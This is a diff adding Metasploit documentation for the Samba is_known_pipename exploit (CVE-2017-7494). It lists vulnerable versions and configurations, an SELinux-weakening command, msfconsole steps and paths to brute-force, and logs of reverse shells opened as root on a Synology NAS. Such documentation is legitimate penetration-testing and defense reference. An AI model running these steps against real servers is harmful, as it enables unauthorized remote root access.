|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +This module exploits Samba from versions 3.5.0-4.4.14, 4.5.10, and 4.6.4 by loading a malicious shared library. |
| 4 | +Samba's download archives are [here](https://download.samba.org/pub/samba/stable/). There are some requirements |
| 5 | +for this exploit to be successful: |
| 6 | + |
| 7 | +1. Valid credentials |
| 8 | +2. Writeable folder in an accessible share |
| 9 | +3. Server-side path of the writeable folder |
| 10 | + |
| 11 | +However, in some cases anonymous access with common filesystem locations can be used to automate exploitation. |
| 12 | + |
| 13 | +A vulnerable Samba config may have a share similar to the following in `smb.conf`. This is a setup for 'easy' exploitation |
| 14 | +where no SMB options are required to be set: |
| 15 | + |
| 16 | +``` |
| 17 | +[exploitable] |
| 18 | +comment = CVE-2017-7494 |
| 19 | +path = /tmp |
| 20 | +writable = yes |
| 21 | +browseable = yes |
| 22 | +guest ok = yes |
| 23 | +``` |
| 24 | + |
| 25 | +Verified on: |
| 26 | + |
| 27 | +1. Synology DS412+ DSM 6.1.1-15101 Update 2 (Samba 4.4.9) |
| 28 | +2. Synology DS412+ DSM 6.1.1-15101 Update 3 (Samba 4.4.9) |
| 29 | +3. Synology DS1512+ DSM 6.1.1-15101 Update 2 (Samba 4.4.9) |
| 30 | +4. Synology DS1512+ DSM 6.1.1-15101 Update 3 (Samba 4.4.9) |
| 31 | +5. Synology DS2415+ DSM 6.1-15047 (Samba 4.3.11) |
| 32 | +6. Ubuntu 14.04.5 x64 (Samba 4.3.9) |
| 33 | +7. Ubuntu 15.04 (Samba 4.1.13) |
| 34 | +8. Ubuntu 16.04 (Samba 4.3.11) |
| 35 | +9. Fedora 24 (Samba 4.4.13) |
| 36 | + |
| 37 | +Currently not working against: |
| 38 | + |
| 39 | +1. QNAP NAS Samba 4.4.9 on armv71 |
| 40 | +2. WD MyClous NAS Samba 4.0.0rc5 armv71 |
| 41 | + |
| 42 | +### SELinux |
| 43 | + |
| 44 | +Fedora (and possibly Redhat) are not exploitable in their default installation. SELinux must be adjusted to allow nmbd to use net_admin, and smbd to exec the payload. |
| 45 | + |
| 46 | +``` |
| 47 | +echo -ne "type=AVC msg=audit(1495745298.086:334): avc: denied { execstack } for pid=2365 comm="smbd" scontext=system_u:system_r:smbd_t:s0 tcontext=system_u:system_r:smbd_t:s0 tclass=process permissive=0\ntype=AVC msg=audit(1495717997.099:267): avc: denied { net_admin } for pid=959 comm="nmbd" capability=12 scontext=system_u:system_r:nmbd_t:s0 tcontext=system_u:system_r:nmbd_t:s0 tclass=capability permissive=0\ntype=AVC msg=audit(1495745002.690:308): avc: denied { execmem } for pid=1830 comm="smbd" scontext=system_u:system_r:smbd_t:s0 tcontext=system_u:system_r:smbd_t:s0 tclass=process permissive=0\ntype=AVC msg=audit(1495745183.319:331): avc: denied { execute } for pid=2313 comm="smbd" path="/tmp/ucFtDpZI.so" dev="tmpfs" ino=27436 scontext=system_u:system_r:smbd_t:s0 tcontext=system_u:object_r:smbd_tmp_t:s0 tclass=file permissive=0" | audit2allow -M cve-2017-7494; semodule -X 300 -i cve-2017-7494.pp |
| 48 | +``` |
| 49 | + |
| 50 | +## Verification Steps |
| 51 | + |
| 52 | +1. Start msfconsole |
| 53 | +2. Do: ```use exploit/linux/samba/is_known_pipename``` |
| 54 | +3. Do: ```set rhost [ip]``` |
| 55 | +4. Do: ```set target [target #]``` |
| 56 | +5. Do: ```exploit``` |
| 57 | + |
| 58 | +## Options |
| 59 | + |
| 60 | + **SMB_SHARE_NAME** |
| 61 | + |
| 62 | + The name of the SMB share containing a writeable directory. Shares are automatically scanned for, and if this |
| 63 | + variable is non-blank, it will be preferred. |
| 64 | + |
| 65 | + **SMB_SHARE_BASE** |
| 66 | + |
| 67 | + The remote filesystem path correlating with the SMB share name. This value is preferred, but other values are |
| 68 | + brute forced including: |
| 69 | + |
| 70 | +1. /volume1 |
| 71 | +2. /volume2 |
| 72 | +3. /volume3 |
| 73 | +4. /shared |
| 74 | +5. /mnt |
| 75 | +6. /mnt/usb |
| 76 | +7. /media |
| 77 | +8. /mnt/media |
| 78 | +9. /var/samba |
| 79 | +10. /tmp/home/home/shared |
| 80 | + |
| 81 | + **SMB_FOLDER** |
| 82 | + |
| 83 | + The directory to use within the writeable SMB share. Writable directories are automatically scanned for, and if this |
| 84 | + variable is non-blank, it will be preferred. |
| 85 | + |
| 86 | +## Scenarios |
| 87 | + |
| 88 | +### Synology DS412+ w/ INTEL Atom D2700 on DSM 6.1.1-15101 Update 2 |
| 89 | + |
| 90 | +``` |
| 91 | +msf exploit(is_known_pipename) > exploit |
| 92 | +
|
| 93 | +[*] Started reverse TCP handler on 1.2.3.117:4444 |
| 94 | +[*] 1.2.3.119:445 - Using location \\1.2.3.119\ESX\ for the path |
| 95 | +[*] 1.2.3.119:445 - Payload is stored in //1.2.3.119/ESX/ as eePUbtdw.so |
| 96 | +[*] 1.2.3.119:445 - Trying location /volume1/eePUbtdw.so... |
| 97 | +[-] 1.2.3.119:445 - Probe: /volume1/eePUbtdw.so: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0) |
| 98 | +[*] 1.2.3.119:445 - Trying location /volume1/ESX/eePUbtdw.so... |
| 99 | +[*] Command shell session 1 opened (1.2.3.117:4444 -> 1.2.3.119:34366) at 2017-05-24 21:12:07 -0400 |
| 100 | +
|
| 101 | +id |
| 102 | +uid=0(root) gid=0(root) groups=0(root),100(users) |
| 103 | +uname -a |
| 104 | +Linux synologyNAS 3.10.102 #15101 SMP Fri May 5 12:01:38 CST 2017 x86_64 GNU/Linux synology_cedarview_412+ |
| 105 | +``` |
| 106 | + |
| 107 | +### Ubuntu 16.04 |
| 108 | + |
| 109 | +``` |
| 110 | +msf exploit(is_known_pipename) > exploit |
| 111 | +
|
| 112 | +[*] Started reverse TCP handler on 192.168.0.3:4444 |
| 113 | +[*] 192.168.0.3:445 - Using location \\192.168.0.3\yarp\h for the path |
| 114 | +[*] 192.168.0.3:445 - Payload is stored in //192.168.0.3/yarp/h as GTithXJz.so |
| 115 | +[*] 192.168.0.3:445 - Trying location /tmp/yarp/h/GTithXJz.so... |
| 116 | +[*] Command shell session 6 opened (192.168.0.3:4444 -> 192.168.0.3:45076) at 2017-05-24 19:41:40 -0500 |
| 117 | +
|
| 118 | +id |
| 119 | +uid=65534(nobody) gid=0(root) groups=0(root),65534(nogroup) |
| 120 | +``` |
0 commit comments